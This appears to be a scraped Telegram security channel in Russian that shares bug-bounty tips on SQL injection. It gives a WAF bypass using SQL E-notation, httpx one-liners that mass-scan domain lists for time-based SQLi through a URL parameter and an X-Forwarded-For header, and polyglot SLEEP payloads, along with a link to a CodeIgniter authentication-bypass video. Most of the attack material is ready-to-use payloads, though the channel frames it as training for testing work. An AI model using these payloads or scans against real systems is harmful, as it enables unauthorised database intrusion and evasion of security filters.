💉 Совет по обходу WAF для SQL-инъекций
Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.
#Web #WAF #SQLi
Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.
https://example.com/getUser?name=' or "=' (403 Forbidden)https://example.com/getUser?name=' or 1337.e(")=' (200 OK)#Web #WAF #SQLi
👍13❤2🤔1
| Привет, друг. На связи Эллиот.
Когда нужно проверить список доменов на Time-Based уязвимости и лень писать шаблон для Nuclei, можно заюзать httpx с параметрами
-timeout, для указания максимального таймаута и -mrt, для вывода только результатов с определенной задержкой.cat web.list | httpx -silent -path '/sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23' -rt -timeout 20 -mrt '>10'
Аналогично, для заголовков:cat web.list | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(10),0))OR" -rt -timeout 20 -mrt '>10'
#Web #SQLi #RCEPlease open Telegram to view this post
VIEW IN TELEGRAM
👍5
Отличная статья и видео-разбор, в котором вы узнаете, почему в Codeigniter, иногда можно обойти авторизацию с помощью пустого или рандомного JSON, а также обычной SQL инъекции в названии параметра.
#Web #SQLi
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Authentication Bypass Using Root Array
Lots of #bugbountytips get posted on twitter, but some of them are ... weird. Let's explore the technical details of one tweet to understand where this tip came from, why this tip was wrong, and eventually learn about the real underlaying vulnerability. This…
👍3🔥1💩1
💉Про полезные нагрузки для SQL инъекций
Данная простая полезная нагрузка для SQL-инъекции будет охватывать не менее 3 различных кейсов:
Данный список вы можете пополнить самостоятельно. Хорошей практикой будет использование тестовых лабораторий и создание нескольких полезных нагрузок для каждого сценария с использованием различных методов.
Это действительно улучшит ваши навыки работы с SQL-инъекциями и пополнит список рабочих полезных нагрузок в вашем арсенале.
Поэтому перестаньте использовать бесполезные вордлисты на 1к строк, не понимая должным образом, что они делают или как они работают. Помните, что из выбора бесполезного количества в ущерб качеству никогда не выйдет ничего хорошего, кроме потери действительно хороших возможностей.
P.S. Для тестов всего этого прекрасно подойдет sqlfiddle.com, в котором можно создавать и тестировать запросы к БД. Тут пример инъекции с применением полезных нагрузок из поста.
#Web #SQLi
Данная простая полезная нагрузка для SQL-инъекции будет охватывать не менее 3 различных кейсов:
SLEEP(5) /*' or SLEEP(5) or'" or SLEEP(5) or "*/
Немного изменив ее, мы можем добиться отсутствия пробелов, что сделает ее более универсальной:SLEEP(5)/*'or(SLEEP(5))or'"or(SLEEP(5))or"*/
Немного модифицировав её, вы сможете охватить некоторые другие случаи:)SLEEP(0.5)(/*')or(SLEEP(0.5))or('")or(SLEEP(0.5))or("*/
Все дело в построении уязвимых SQL-запросов и поиска полезных нагрузок для каждого из них. Данный список вы можете пополнить самостоятельно. Хорошей практикой будет использование тестовых лабораторий и создание нескольких полезных нагрузок для каждого сценария с использованием различных методов.
Это действительно улучшит ваши навыки работы с SQL-инъекциями и пополнит список рабочих полезных нагрузок в вашем арсенале.
Поэтому перестаньте использовать бесполезные вордлисты на 1к строк, не понимая должным образом, что они делают или как они работают. Помните, что из выбора бесполезного количества в ущерб качеству никогда не выйдет ничего хорошего, кроме потери действительно хороших возможностей.
P.S. Для тестов всего этого прекрасно подойдет sqlfiddle.com, в котором можно создавать и тестировать запросы к БД. Тут пример инъекции с применением полезных нагрузок из поста.
#Web #SQLi
👍4❤1